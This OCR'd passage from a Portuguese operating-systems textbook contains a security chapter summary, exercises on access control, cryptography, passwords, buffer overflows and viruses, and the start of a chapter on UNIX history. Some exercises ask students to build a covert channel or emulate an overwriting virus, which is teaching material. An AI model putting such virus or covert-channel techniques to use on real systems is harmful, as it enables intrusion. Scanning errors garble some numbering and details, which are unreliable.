Uma maneira de manter a informação secreta é crip- 
tografá-la e gerenciar as chaves cuidadosamente. Es- 
quemas criptográficos podem ser categorizados como 
chave secreta ou chave pública. Um método de chave 
secreta exige que as partes se comunicando troquem 
uma chave secreta antecipadamente, usando algum me- 
canismo fora de banda. A criptografia de chave pública 
não exige a troca secreta de chaves antecipadamente, 
mas seu uso é muito mais lento. Às vezes é necessário 
provar a autenticidade da informação digital, caso em 
que resumos criptográficos, assinaturas digitais e cer- 
tificados assinados por uma autoridade de certificação 
confiável podem ser usados. 

Em qualquer sistema seguro, usuários precisam ser 
autenticados. Isso pode ser feito por algo que o usuá- 
rio conhece, algo que ele tem, ou que ele é (biometria). 
A identificação por dois fatores, como uma leitura de 
íris e uma senha, pode ser usada para incrementar a 
segurança. 

Muitos tipos de defeitos no código podem ser ex- 
plorados para assumir os programas e sistemas. Esses 
incluem transbordamentos de buffer, ataques por string 
de formato, ataques por ponteiros pendentes, ataques 
de retorno à libc, ataques por dereferência de pontei- 
ro nulo, ataques por transbordamento de inteiro, ata- 
ques por injeção de comando e TOCTOUs. De maneira 


PROBLEMAS 


1. Confidencialidade, integridade e disponibilidade são três 
componentes da segurança. Descreva uma aplicação que 
exige integridade e disponibilidade, mas não confidencia- 
lidade; uma aplicação que exige confidencialidade e inte- 
gridade, mas não (alta) disponibilidade; e uma aplicação 
que exige confidencialidade, integridade e disponibilidade. 

2. Uma das técnicas para construir um sistema operacio- 
nal seguro é minimizar o tamanho do TCB. Quais das 
funções a seguir precisam ser implementadas dentro do 
TCB e quais podem ser implementadas fora do TCB: 
(a) chaveamento de contexto de processo; (b) ler um ar- 
quivo do disco; (c) adicionar mais espaço de troca; (d) 
ouvir música; (e) conseguir as coordenadas de GPS de 
um smartphone. 

3. O que é um canal oculto? Qual é a exigência básica para 
um canal oculto existir? 

4. Em uma matriz de controle de acesso completo, as li- 
nhas são para domínios e as colunas são para objetos. 
O que acontece se algum objeto é necessário em dois 
domínios? 

5. Suponha que um sistema tenha 5.000 objetos e 100 
domínios em determinado momento. 1% dos objetos 
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semelhante, há muitas contramedidas que tentam evitar 
esses ataques. Exemplos incluem canários de pilha, pre- 
venção de execução de dados e randomização de layout 
de espaço de endereçamento. 

Ataques de dentro do sistema, como empregados da 
empresa, podem derrotar um sistema de segurança de 
uma série de maneiras. Essas incluem bombas lógicas 
colocadas para detonarem em alguma data futura, trap 
doors para deixar essa pessoa ter acesso não autorizado 
mais tarde e mascaramento de login. 

A internet está cheia de malware, incluindo cavalos de 
Troia, vírus, worms, spyware e rootkits. Cada um desses 
apresenta uma ameaça à confidencialidade e integridade 
dos dados. Pior ainda, um ataque de malware pode ser 
capaz de tomar conta de uma máquina e transformá-la 
em um zumbi que envia spam ou é usado para lançar ou- 
tros ataques. Muitos dos ataques por toda a internet são 
realizados por exércitos de zumbis sob o controle de um 
mestre remoto (botmaster). 

Felizmente, há uma série de maneiras como os 
sistemas podem defender-se. A melhor estratégia é a 
defesa em profundidade, usando múltiplas técnicas. 
Algumas dessas incluem firewalls, varreduras de vi- 
rus, assinatura de código, encarceramento e sistemas 
de detecção de intrusão, assim como o encapsula- 
mento de código móvel. 


é acessível (alguma combinação de 7 w e x) em todos 

os domínios, 10% são acessíveis em dois domínios e os 

restantes 89% são acessíveis em apenas um domínio. 

Suponha que uma unidade de espaço é necessária para 

armazenar um direito de acesso (alguma combinação de 

r, w, x), identidade do objeto, ou uma identidade de do- 

mínio. Quanto espaço é necessário para armazenar toda 

a matriz de proteção, matriz de proteção como ACL e 

matriz de proteção como lista de capacidade? 

6. Explique qual implementação da matriz de proteção é 

mais adequada para as seguintes operações. 

(a) Conceder acesso de leitura para um arquivo para 
todos os usuários. 

(b) Revogar acesso de escrita para um arquivo de todos 
os Usuários. 

(c) Conceder acesso de escrita para um arquivo para 
John, Lisa, Christie e Jeff. 

(d) Revogar o acesso de execução para um arquivo de 
Jana, Mike, Molly e Shane. 

7. Dois mecanismos de proteção diferentes que discutimos 
são as capacidades e as listas de controle de acesso. Para 
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10. 


11. 


12. 


cada um dos problemas de proteção a seguir, diga qual 

desses mecanismos pode ser usado. 

(a) Ken quer os seus arquivos legíveis por todos exceto 

seu colega de escritório. 

(b) Mitch e Steve querem compartilhar alguns arqui- 

vos secretos. 

(c) Linda quer que alguns dos seus arquivos tornem-se 
públicos. 

Represente a propriedade e permissões mostradas nesse 

diretório UNIX listando como uma matriz de proteção. 

(Nota: asw é um membro dos dois grupos: users e devel; 

gmw é um membro somente de users.) Trate cada um 

dos dois usuários e dois grupos como um domínio, de 

maneira que a matriz tenha quatro filas (uma por domi- 

nio) e quatro colunas (uma por arquivo). 

908 Maio 26 16:45 PPP- Notes 


2 gmw users 


1tasw devel 432 Maio 13 12:35 prog1 


users 50094 Maio 30 17:51 project.t 


devel 13124 Maio 31 14:30 splash.gif 


Expresse as permissões mostradas na listagem de dire- 
tório do problema anterior como listas de controle de 
acesso. 

Modifique o ACL do problema anterior para um arqui- 
vo para conceder ou negar um acesso que não possa ser 
expresso usando o sistema UNIX rwx. Explique essa 
modificação. 

Suponha que existam quatro níveis de segurança 1,2 e 3. 
Os objetos 4 e B estão no nível 1, Ce D estão no nível 2, 
e Ee F estão no nivel 3. Os processos 1 e 2 estão no ní- 
vel 1,3 e 4 estão no nível 2, e 5 e 6 estão no nível 3. Para 
cada uma das operações a seguir, especifique se elas são 
permissíveis sob o modelo Bell-LaPadula, modelo Biba, 
ou ambos. 


(a) 
(b) 
(c) Processo 3 lê objeto C 
(d) 
(e) Processo 2 lê objeto D 


Processo 1 escreve objeto D 
Processo 4 lê objeto 4 


Processo 3 escreve objeto C 


(f) Processo 5 escreve objeto F 


(g) 
(h) 
(i) Processo 3 lê objeto F 


Processo 6 lê objeto E 
Processo 4 escreve objeto E 


No esquema Amoeba para proteger capacidades, um 
usuário pode pedir ao servidor para produzir uma nova 
capacidade com menos direitos, que podem então ser 
dados para um amigo. O que acontece se o amigo pede 
ao servidor para remover ainda mais direitos de maneira 
que o amigo possa dá-lo para outra pessoa? 


13. 


14. 


15. 


16. 


17. 


18. 


19. 


Na Figura 9.11, há uma flecha do processo B para o ob- 
jeto 1. Você gostaria que essa flecha fosse permitida? Se 
não, qual regra ela violaria? 

Se mensagens processo para processo são permitidas na 
Figura 9.11, quais regras se aplicariam a elas? Para o 
processo B em particular, para quais processos ele pode- 
ria enviar mensagens e para quais não? 

Considere o sistema esteganográfico da Figura 9.14. 
Cada pixel pode ser representado em um espaço de cor 
por um ponto no sistema tridimensional com eixos para 
os valores R, G e B. Usando esse espaço, explique o que 
acontece à resolução de cor quando a esteganografia é 
empregada como ela está nessa figura. 

Descubra o código para esse conjunto cifrado monoal- 
fabético. O texto puro, consistindo em letras somente, 
é um trecho bem conhecido de um poema de Lewis 
Carroll. 


kfd ktbd fzm eubd kfd pzyiom mztx ku kzyg ur bzha kfthem 
ur mfudm zhx mftnm zhx mdzythe pzq ur ezsszedm zhx gthem 
zhx pfa kfd mdz tm sutythe fuk zhx pfdkfdi ntem fzld pthem 
sok pztk z stk kfd uamkdim eitdx sdruid pd fzld uoi efzk 

rui mubd ur om zid uok ur sidzkf zhx zyy ur om zid rzk 

hu foiia mztx kfd ezindhkdi kfda kfzhgdx ftb boef rui kfzk 


Considere uma chave secreta cifrada que tem uma ma- 
triz 26 x 26 com as colunas com o cabeçalho ABC... Z 
e as linhas também chamadas ABC... Z. O texto puro é 
criptografado dois caracteres de cada vez. O primeiro 
caractere é a coluna; o segundo é a linha. A célula forma- 
da pela interseção da linha e da coluna contém dois ca- 
racteres de texto cifrado. A qual restrição a matriz deve 
aderir e quantas chaves existem ali? 

Considere a maneira a seguir para criptografar um ar- 
quivo. O algoritmo criptográfico usa dois conjuntos de n 
bytes, 4 e B. Os primeiros n bytes são lidos do arquivo 
em A. Então A[0] é copiado para Biz], 4[1] é copiado para 
B[/], A[2] é copiado para B[k] etc. Afinal de contas, todos 
os n bytes são copiados para o arranjo B, esse arranjo é 
escrito para o arquivo de saída e n mais bytes são lidos em 
A. Esse procedimento continua até o arquivo inteiro ter 
sido criptografado. Observe que aqui a criptografia não 
está sendo feita pela substituição de caracteres por outros, 
mas pela modificação da sua ordem. Quantas chaves pre- 
cisam ser tentadas para buscar exaustivamente o espaço 
chave? Dê uma vantagem desse esquema sobre um arran- 
jo cifrado de substituição monoalfabética. 

A criptografia de chave secreta é mais eficiente do que a 
criptografia de chave pública, mas exige que o emissor 
e o receptor concordem a respeito de uma chave anteci- 
padamente. Suponha que o emissor e o receptor jamais 
tenham se encontrado, mas existe um terceiro confiável 
que compartilha de uma chave secreta com o emissor 


20. 


21. 


22. 


23. 


24. 


25. 


26. 


e também compartilha de uma chave secreta (diferen- 
te) com o receptor. Como podem o emissor e o receptor 
estabelecer uma nova chave secreta compartilhada sob 
essas circunstâncias? 
Dê um simples exemplo de uma função matemática que 
para uma primeira aproximação funcionará com uma 
função de sentido único. 
Suponha que dois estrangeiros 4 e B queiram comu- 
nicar-se um com o outro usando criptografia de chave 
secreta, mas não compartilham a chave. Suponha que 
ambos confiem em um terceiro, C, cuja chave pública é 
bem conhecida. Como podem os dois estrangeiros esta- 
belecer uma nova chave secreta compartilhada sob essas 
circunstâncias? 
À medida que cybercafés tornaram-se mais comuns, as 
pessoas irão querer ir a um em qualquer parte no mundo 
e conduzir negócios lá. Descreva uma maneira para pro- 
duzir documentos assinados de uma pessoa usando um 
cartão inteligente (presuma que todos os computadores 
estão equipados com leitores de cartão inteligente). O 
seu esquema é seguro? 
Texto em língua natural em ASCII pode ser comprimido 
em pelo menos 50% usando vários algoritmos de com- 
pressão. Usando esse conhecimento, qual é a capacidade 
esteganográfica para um texto ASCII (em bytes) de uma 
imagem 1600 x 1200 armazenada usando bits de baixa 
ordem de cada pixel? Em quanto o tamanho da imagem 
foi aumentado pelo uso dessa técnica (presumindo que 
não houve encriptação ou nenhuma expansão decorrente 
de encriptação)? Qual é a eficiência do esquema, isto é, 
sua (carga util)/(bytes transmitidos)? 
Suponha que um grupo muito fechado de dissidentes 
políticos vivendo em um país repressor está usando a 
esteganografia para enviar mensagens para o mundo 
a respeito das condições em seu país. O governo tem 
consciência disso e está combatendo-os enviando ima- 
gens falsas contendo mensagens esteganográficas falsas. 
Como os dissidentes podem ajudar as pessoas a diferen- 
ciarem as mensagens reais das falsas? 
Vá para <www.cs.vu.nl/ast> e clique no link covered 
writing. Siga as instruções para extrair as peças. Res- 
ponda às seguintes questões: 
(a) Quais são os tamanhos dos arquivos original zebras 
e zebras? 
(b) Quais peças estão secretamente armazenadas no ar- 
quivo zebras? 
(c) Quantos bytes estão secretamente armazenados no 
arquivo zebras? 
Não ter o computador ecoando a senha é mais seguro 
do que tê-lo ecoando um asterisco para cada caractere 
digitado, tendo em vista que o segundo revela o com- 
primento da senha para qualquer pessoa próxima que 
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possa ver a tela. Presumindo que senhas consistam de 
letras maiúsculas e minúsculas e dígitos apenas, e que 
as senhas precisem ter um mínimo de cinco caracteres e 
um máximo de oito caracteres, quão mais seguro é não 
exibir nada? 

Após se formar na faculdade, você se candidata a um 
emprego como diretor de um grande centro de computa- 
dores de uma universidade que há pouco aposentou seu 
velho sistema de computadores de grande porte e pas- 
sou para um grande servidor LAN executando UNIX. 
Você conquista o emprego. Quinze minutos depois de 
começar a trabalhar, o seu assistente entra correndo no 
escritório gritando: “Alguns estudantes descobriram o 
algoritmo que usamos para criptografar senhas e o pos- 
taram na internet”. O que você deve fazer? 

O esquema de proteção Morris-Thompson com números 
aleatórios de n-bits (sal) foi projetado para tornar difícil 
para um intruso descobrir um grande número de senhas 
ao criptografar cadeias comuns antecipadamente. Esse 
esquema também oferece proteção contra um usuário 
estudante que esteja tentando adivinhar a senha de su- 
perusuário na sua máquina? Presuma que um arquivo de 
senha esteja disponível para leitura. 

Suponha que o arquivo de senha de um sistema este- 
ja disponível para um cracker. Quanto tempo a mais o 
cracker precisa para descobrir todas as senhas se o siste- 
ma está usando o esquema de proteção Morris-Thomp- 
son com sal n-bit versus se o sistema não está usando 
esse esquema? 

Nomeie três características que um bom indicador bio- 
métrico precisa ter a fim de ser útil como um identifica- 
dor de login. 

Mecanismos de autenticação são divididos em três cate- 
gorias: algo que o usuário sabe, algo que ele tem e algo 
que ele é. Imagine um sistema de autenticação que usa 
uma combinação dessas três categorias. Por exemplo, 
ele primeiro pede ao usuário para inserir um login e uma 
senha, então insere um cartão plástico (com uma fita 
magnética) e insere um PIN, e por fim fornece as im- 
pressões digitais. Você consegue pensar em dois defeitos 
nesse projeto? 

Um departamento de ciências computacionais tem uma 
grande coleção de máquinas UNIX em sua rede local. 
Usuários em qualquer máquina podem emitir um co- 
mando na seguinte forma 


rexec machine4 who 


e ter o comando executado na machine4, sem o usuário 
ter de conectar-se à maquina remota. Essa caracteristi- 
ca é implementada fazendo com que o núcleo do usuário 
envie o comando e sua UID para a máquina remota. Esse 


esquema é seguro se todos os núcleos são confiáveis? 
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E se algumas das máquinas forem os computadores pessoais 
dos estudantes, sem proteção alguma? 

O esquema de senha de uma única vez de Lamport usa 
as senhas em ordem inversa. Seria mais simples usar 
f(s) da primeira vez, f(f(s)) da segunda e assim por 
diante? 

Existe alguma maneira possível de usar o MMU de hard- 
ware para evitar o tipo de ataque por transbordamento 
mostrado na Figura 9.21? Explique por quê. 

Descreva como canários de pilha funcionam e como eles 
podem ser evitados pelos atacantes. 

O ataque TOCTOU explora condições de corrida entre o 
atacante e a vítima. Uma maneira de evitar condições de 
corrida é fazer transações de acessos do sistema de ar- 
quivos. Explique como essa abordagem pode funcionar 
e quais problemas podem surgir. 

Nomeie uma característica de um compilador C que pode- 
ria eliminar um grande número de brechas de segurança. 
Por que elas não são mais amplamente implementadas? 
O ataque com cavalo de Troia pode funcionar em um 
sistema protegido por capacidades? 

Quando um arquivo é removido, seus blocos geralmente 
são colocados de volta na lista livre, mas eles não são 
apagados. Você acha que seria uma boa ideia fazer com 
que o sistema operacional apagasse cada bloco antes de 
liberá-lo? Considere ambos os fatores de segurança e de- 
sempenho em sua resposta, e explique o efeito de cada. 
Como pode um vírus parasita (a) assegurar que ele será 
executado diante de seu programa hospedeiro e (b) pas- 
sar o controle de volta para o seu hospedeiro após ele ter 
feito o que tinha para fazer? 

Alguns sistemas operacionais exigem que partições de 
disco devam começar no início de uma trilha. Como 
isso torna a vida mais fácil para um vírus do setor de 
inicialização? 

Mude o programa da Figura 9.28 de maneira que ele en- 
contre todos os programas C em vez de todos os arqui- 
vos executáveis. 

O virus na Figura 9.33(d) está criptografado. Como po- 
dem os dedicados cientistas no laboratório antivírus di- 
zer qual parte do arquivo é a chave para que eles possam 
decriptar o vírus e realizar uma engenharia reversa nele? 
O que Virgil pode fazer para tornar o seu trabalho mais 
difícil ainda? 

O vírus da Figura 9.33(c) tem compressor e descom- 
pressor. O descompressor é necessário para expandir e 
executar o programa executável comprimido. Para que 
serve o compressor? 

Nomeie uma desvantagem de um vírus criptográfico po- 
limórfico do ponto de vista de um escritor de vírus. 
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Muitas vezes você vê as instruções a seguir para a recu- 

peração de um ataque por vírus. 

1. Derrube o sistema infectado. 

2. Faça um backup de todos os arquivos para um meio 
externo. 

3. Execute fdisk (ou um programa similar) para for- 
matar o disco. 

4. Reinstale o sistema operacional do CD-ROM 
original. 

5. Recarregue os arquivos do meio externo. 

Nomeie dois erros sérios nessas instruções. 

Vírus companheiros (vírus que não modificam quais- 

quer arquivos existentes) são possíveis em UNIX? Se 

afirmativo, como? Se negativo, por que não? 

Arquivos que são autoextraidos, que contêm um ou mais 

arquivos comprimidos empacotados com um programa 

de extração, frequentemente são usados para entregar 

programas ou atualizações de programas. Discuta as im- 

plicações de segurança dessa técnica. 

Por que os rootkits são extremamente difíceis ou qua- 

se impossíveis de detectar em comparação com vírus e 

vermes? 

Poderia uma máquina infectada com um rootkit ser res- 

taurada para uma boa saúde simplesmente levando o es- 

tado do software de volta para um ponto de restauração 

do sistema previamente armazenado? 

Discuta a possibilidade de escrever um programa que 

tome outro como entrada e determine se ele contém um 

vírus. 

A Seção 9.10.1 descreve um conjunto de regras de fi- 

rewall para limitar o acesso de fora para apenas três ser- 

viços. Descreva outro conjunto de regras que você possa 

acrescentar a esse firewall para restringir mais ainda o 

acesso a esses serviços. 

Em algumas máquinas, a instrução SHR usada na Fi- 

gura 9.38(b) preenche os bits não utilizados com zeros; 

em outras, o sinal do bit é estendido para a direita. Para 

a correção da Figura 9.38(b), importa qual tipo de ins- 

trução de deslocamento é usada? Se afirmativo, qual é a 

melhor? 

Para verificar se um applet foi assinado por um ven- 

dedor confiável, o vendedor do applet pode incluir um 

certificado assinado por um terceiro de confiança que 

contém sua chave pública. No entanto, para ler o cer- 

tificado, o usuário precisa da chave pública do tercei- 

ro. Isso poderia ser providenciado por uma quarta parte 

confiável, mas então o usuário precisa da chave pública. 

Parece que não há como iniciar o sistema de verificação, 

no entanto navegadores existentes o usam. Como ele po- 

deria funcionar? 
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Descreva as características que tornam Java uma lin- 
guagem de programação melhor do que C para escrever 
programas seguros. 

Presuma que o seu sistema esteja usando JDK 1.2. Mos- 
tre as regras (similares àquelas da Figura 9.40) que você 
usará para permitir que um applet de <www.appletsRus. 
com> execute em sua máquina. Esse applet pode baixar 
arquivos adicionais de <www.appletsRus.com>, ler/es- 
crever arquivos em /usr/tmp/, e também ler arquivos de 
/usrime/appletdir. 

Como os applets são diferentes das aplicações? Como 
essa diferença relaciona-se com a segurança? 

Escreva um par de programas, em C ou com scripts de 
shell, para enviar e receber uma mensagem através de 
um canal oculto em um sistema UNIX. (Dica: um bit 
de permissão pode ser visto mesmo quando um arquivo 
é de outra maneira inacessível, e o comando sleep ou 
chamada de sistema é garantido que atraso por um tem- 
po fixo, estabelecido por seu argumento.) Meça o índice 
de dados em um sistema ocioso. Então crie uma carga 
artificialmente pesada inicializando inúmeros diferentes 
processos de segundo plano e meça o índice de dados 
novamente. 

Diversos sistemas UNIX usam o algoritmo DES para 
criptografar senhas. Esses sistemas tipicamente aplicam 
DES 25 vezes seguidas para obter uma senha cripto- 
grafada. Baixe uma implementação de DES da internet 
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e escreva um programa que criptografe uma senha e 
confira-se ela é válida para esse sistema. Gere uma lista 
de 10 senhas criptografadas usando o esquema de prote- 
ção de Morris-Thompson. Use sal de 16 bits para o seu 
programa. 

Suponha que um sistema use ACLs para manter a sua 
matriz de proteção. Escreva um conjunto de funções 
de gerenciamento para gerenciar ACLs quando (1) um 
novo objeto é criado; (2) um objeto é apagado; (3) um 
novo domínio é criado; (4) um domínio é apagado; (5) 
novos direitos de acesso (uma combinação de 7, w, x) são 
concedidos para um domínio para acessar um objeto; (6) 
direitos de acesso existentes de um domínio para acessar 
um objeto são revogados; (7) novos direitos de acesso 
são concedidos para todos os domínios para acessar um 
objeto; (8) direitos de acesso para acessar um objeto são 
revogados de todos os domínios. 

Implemente o código de programa delineado na Seção 
9.7.1 para ver o que acontece quando há um transborda- 
mento de buffer. Experimente com diferentes tamanhos 
de string. 

Escreva um programa que emule os vírus de sobreposi- 
ção delineados na Seção 9.9.2 sob o cabeçalho “Vírus de 
programas executáveis”. Escolha um arquivo executável 
existente que você sabe que pode ser sobrescrito sem 
problemas. Para o binário do vírus, escolha qualquer bi- 
nário executável inofensivo. 


CAPÍTULO 


os capítulos anteriores, examinamos de perto mui- 

tos princípios de sistema operacionais, abstrações, 

algoritmos e técnicas em geral. Agora chegou o 

momento de olharmos para alguns sistemas con- 

cretos para ver como esses princípios são aplica- 
dos no mundo real. Começaremos com o Linux, uma 
variante popular do UNIX, que é executado em uma 
ampla variedade de computadores. Ele é um dos siste- 
mas operacionais dominantes nas estações de trabalho 
e servidores de alto desempenho, mas também é usado 
em sistemas que vão desde smartphones (o Android é 
baseado no Linux) a supercomputadores. 

Nossa discussão começará com a história e a evolu- 
ção do UNIX e do Linux. Então forneceremos uma visão 
geral do Linux, para dar uma ideia de como ele é usa- 
do. Essa visão geral será de valor especial para leitores 
familiarizados somente com o Windows, visto que este 
esconde virtualmente todos os detalhes do sistema dos 
usuários. Embora interfaces gráficas possam ser fáceis 
para os iniciantes, elas fornecem pouca flexibilidade e 
nenhuma informação sobre como o sistema funciona. 

Em seguida, chegamos ao cerne deste capítulo, um 
exame dos processos, gerenciamento de memória, E/S, o 
sistema de arquivos e segurança no Linux. Para cada tópi- 
co, primeiro discutiremos os conceitos fundamentais, en- 
tão as chamadas de sistema e, por fim, a implementação. 

Inicialmente devemos abordar a questão: por que Li- 
nux? Linux é uma variante do UNIX, mas há muitas ou- 
tras versões e variantes do UNIX, incluindo AIX, Free 
BSD, HP-UX, SCO UNIX, System V, Solaris e outros. 
Felizmente, os princípios fundamentais e as chamadas 
de sistema são muito parecidos para todos eles (por pro- 
jeto). Além disso, as estratégias de implementação ge- 
ral, algoritmos e estruturas de dados são similares, mas 





há algumas diferenças. Para tornar os exemplos concre- 
tos, é melhor escolher um deles e descrevê-lo consisten- 
temente. Como a maioria dos leitores possivelmente já 
lidou com o Linux, usaremos essa variação como nos- 
so exemplo. Lembre-se, no entanto, de que exceto pela 
informação sobre implementação, grande parte deste 
capítulo aplica-se a todos sistemas UNIX. Um grande 
número de livros foi escrito sobre como usar o UNIX, 
mas existem também alguns sobre características avan- 
çadas e questões internas dos sistemas (LOVE, 2013; 
MCKUSICK e NEVILLE-NEIL, 2004; NEMETH et 
al., 2013; OSTROWICK, 2013; SOBELL, 2014; STE- 
VENS e RAGO, 2013; e VAHALIA, 2007). 


10.1 História do UNIX e do Linux 


O UNIX e o Linux têm uma longa e interessante 
história. O que começou como um projeto de interesse 
pessoal de um jovem pesquisador (Ken Thompson) tor- 
nou-se uma indústria de bilhões de dólares envolvendo 
universidades, corporações multinacionais, governos e 
grupos de padronização internacionais. Nas páginas a 
seguir contaremos como essa história se desenrolou. 


10.1.1 UNICS 


Nas distantes décadas de 1940 e 1950, só havia 
computadores pessoais, no sentido de que a maneira 
normal de usá-los à época era reservar por um tempo e 
apoderar-se da máquina inteira durante aquele período. 
É claro, aquelas máquinas eram fisicamente imensas, 
mas apenas uma pessoa (o programador) podia usá-las 
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a qualquer dado momento. Quando os sistemas em lote 
assumiram o seu lugar, na década de 1960, o progra- 
mador submetia uma tarefa por cartões perfurados tra- 
zendo-os para a sala de máquinas. Quando um número 
suficiente de tarefas havia sido reunido, o operador as 
lia todas em um único lote. Em geral levava uma hora 
ou mais após submeter uma tarefa para que a saída fosse 
gerada. Nessas circunstâncias, a depuração era um pro- 
cesso que consumia tempo, pois uma única vírgula mal 
colocada poderia resultar em diversas horas desperdiça- 
das do tempo do programador. 

Para contornar o que todos viam como um arranjo 
insatisfatório, improdutivo e frustrante, o compartilha- 
mento de tempo foi inventado no Dartmouth College e 
no MIT. O sistema Dartmouth executava apenas BASIC 
e gozou de um sucesso comercial curto antes de desapa- 
recer. O sistema do MIT, CTSS, era de propósito geral 
e foi um grande sucesso na comunidade científica. Em 
pouco tempo, pesquisadores no MIT juntaram forças 
com o Bell Labs e a General Electric (à época uma ven- 
dedora de computadores) e começaram a projetar um 
sistema de segunda geração, MULTICS (MULTIple- 
xed Information and Computing Service — serviço 
de computação e informação multiplexada), como dis- 
cutimos no Capítulo 1. 

Embora o Bell Labs tenha sido um dos parceiros 
fundadores do projeto MULTICS, mais tarde ele caiu 
fora, o que deixou o pesquisador do Bell Labs, Ken 
Thompson, à procura de algo interessante para fazer. 
Ele por fim decidiu escrever um MULTICS mais enxu- 
to para si (em linguagem de montagem dessa vez) em 
um velho minicomputador PDP-7 descartado. Apesar 
do tamanho minúsculo do PDP-7, o sistema de Thomp- 
son realmente funcionava e podia dar suporte ao esforço 
de desenvolvimento do pesquisador. Em consequência, 
outro pesquisador no Bell Labs, Brian Kernighan, um 
tanto ironicamente, chamou-o de UNICS (UNiplexed 
Information and Computing Service — serviço de 
computação e informação uniplexada). Apesar da brin- 
cadeira de o sistema “EUNUCHS” ser um MULTICS 
castrado, o nome pegou, embora sua escrita tenha sido 
mais tarde mudada para UNIX. 


10.1.2 PDP-11 UNIX 


O trabalho de Thompson impressionou de tal manei- 
ra seus colegas no Bell Labs que logo Dennis Ritchie 
juntou-se a ele e mais tarde o seu departamento inteiro. 
Dois desenvolvimentos importantes ocorreram nessa 
época. Primeiro, o UNIX foi movido do PDP-7 obsole- 
to para o muito mais moderno PDP-11/20 e então, mais 


tarde, para o PDP-11/45 e PDP-11/70. As duas últimas 
máquinas dominaram o mundo dos computadores por 
grande parte dos anos de 1970. O PDP-11/45 e o PDP- 
-11/70 eram máquinas poderosas com grandes memórias 
físicas para sua era (256 KB e 2 MB, respectivamente). 
Também, elas tinham um hardware de proteção de me- 
mória, tornando possível suportar múltiplos usuários ao 
mesmo tempo. No entanto, ambas eram máquinas de 16 
bits que limitavam os processos individuais a 64 KB de 
espaço de instrução e 64 KB de espaço de dados, embo- 
ra a máquina talvez tivesse muito mais memória física. 

O segundo desenvolvimento dizia respeito à lingua- 
gem na qual o UNIX foi escrito. A essa altura, havia 
se tornado dolorosamente óbvio que ter de reescrever 
o sistema inteiro para cada máquina nova não era nem 
um pouco divertido, então Thompson decidiu reescre- 
ver o UNIX em uma linguagem de alto nível projeta- 
da por ele, chamada B. Era uma forma simplificada de 
BCPL (que por sua vez era uma forma simplificada de 
CPL, a qual, assim como a PL/I, jamais funcionara). 
Por causa dos pontos fracos em B, fundamentalmente a 
falta de estruturas, essa tentativa não foi bem-sucedida. 
Ritchie então projetou um sucessor para B, chamado 
C (naturalmente), e escreveu um excelente compilador 
para ele. Trabalhando juntos, Thompson e Ritchie rees- 
creveram o UNIX em C, que era a linguagem certa no 
momento certo e dominou a programação de sistemas 
desde então. 

Em 1974, Ritchie e Thompson publicaram um arti- 
go seminal sobre o UNIX (RITCHIE e THOMPSON, 
1974). Pelo trabalho descrito nesse artigo eles mais tar- 
de receberam o prestigioso prêmio ACM Turing Award 
(RITCHIE, 1984; THOMPSON, 1984). A publicação 
do artigo estimulou muitas universidades a pedir ao Bell 
Labs uma cópia do UNIX. Como a empresa controlado- 
ra do Bell Labs, AT&T, era um monopólio regulamen- 
tado à época e não era permitido atuar no segmento de 
computadores, ela não fez objeção alguma em licenciar 
o UNIX para as universidades por uma taxa modesta. 

Em uma dessas coincidências que muitas vezes mol- 
dam a história, o PDP-11 foi a escolha de computador 
de quase todos os departamentos de computação das 
universidades, e os sistemas operacionais que vinham 
com os PDP-11 eram amplamente considerados ruins 
tanto por professores quanto por estudantes. O UNIX 
logo preencheu esse vazio, e o fato de ele vir com um 
código-fonte completo, de maneira que as pessoas pu- 
dessem mexer nele o quanto quisessem, também ajudou 
em sua popularização. Encontros científicos eram or- 
ganizados em torno do UNIX, com palestrantes reno- 
mados contando a respeito de algum erro obscuro de 


núcleo que eles haviam encontrado e consertado. Um 
professor australiano, John Lions, escreveu um comen- 
tário sobre o código-fonte UNIX do tipo normalmente 
reservado para os trabalhos de Chaucer ou Shakespeare 
(reimpresso como LIONS, 1996). O livro descreveu a 
Versão 6, assim chamada porque foi descrita na sexta 
edição do Manual do Programador do UNIX. O código- 
-fonte tinha 8.200 linhas de C e 900 linhas de código 
de montagem. Como resultado de toda essa atividade, 
novas ideias e melhorias para o sistema disseminaram- 
-se rapidamente. 

Em poucos anos, a Versão 6 foi substituída pela Ver- 
são 7, a primeira versão portátil do UNIX (ele executa- 
va no PDP-11 e o Interdata 8/32), a essa altura 18.800 
linhas de C e 2.100 de montagem. Uma geração inteira 
de estudantes foi criada na Versão 7, o que contribuiu 
para sua disseminação após eles terem se formado e ido 
trabalhar na indústria. Em meados dos anos de 1980, 
o UNIX era amplamente usado em minicomputadores 
e estações de trabalho de engenharia de uma série de 
vendedores. Uma série de empresas chegou a licenciar 
o código-fonte para fazer a sua própria versão do UNIX. 
Uma dessas era uma empresa pequena começando a se 
desenvolver chamada Microsoft, que vendeu a Versão 7 
sob o nome XENIX por alguns anos até que seus inte- 
resses mudaram. 


10.1.3 UNIX portátil 


Agora que o UNIX estava escrito em C, movê-lo 
para uma nova máquina — um processo conhecido 
como portabilidade — era algo muito mais fácil de fa- 
zer do que no começo, quando ele era escrito em lingua- 
gem de montagem. A migração exige primeiro que se 
escreva um compilador C para a maquina nova. Então é 
necessário escrever drivers de dispositivos para os no- 
vos dispositivos de E/S da máquina, como monitores, 
impressoras e discos. Embora o código do driver este- 
ja em C, ele não pode ser movido para outra maquina, 
compilado e executado ali porque dois discos jamais 
funcionam da mesma maneira. Por fim, uma pequena 
quantidade de códigos que dependem da máquina, como 
manipuladores de interrupção e rotinas de gerenciamen- 
to de memória, devem ser reescritos, normalmente em 
linguagem de montagem. 

A primeira migração além do PDP-11 foi para o mi- 
nicomputador Interdata 8/32. Esse exercício revelou um 
grande número de suposições que o UNIX implicita- 
mente fez a respeito das máquinas nas quais ele esta- 
va executando, como a suposição não mencionada de 
que os inteiros continham 16 bits, ponteiros também 
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continham 16 bits (implicando um tamanho de progra- 
ma maximo de 64 KB) e que a maquina tinha exatamen- 
te três registradores disponíveis para conter variáveis 
importantes. Nenhuma delas mantinha-se para a Inter- 
data, de maneira que foi necessário um trabalho consi- 
derável para limpar o UNIX. 

Outro problema era que, embora o compilador de 
Ritchie fosse rápido e produzisse um bom código-ob- 
jeto, ele produzia apenas código-objeto PDP-11. Em 
vez de escrever um novo compilador especificamente 
para o Interdata, Steve Johnson do Bell Labs projetou 
e implementou o compilador portátil C, que podia 
ser redirecionado para produzir códigos para qualquer 
máquina razoável com apenas uma quantidade mode- 
rada de esforço. Por anos, quase todos os compiladores 
C para máquinas que não o PDP-11 eram baseados no 
compilador de Johnson, o qual ajudou muito a dissemi- 
nação do UNIX para novos computadores. 

A migração para o Interdata foi lenta a princípio, 
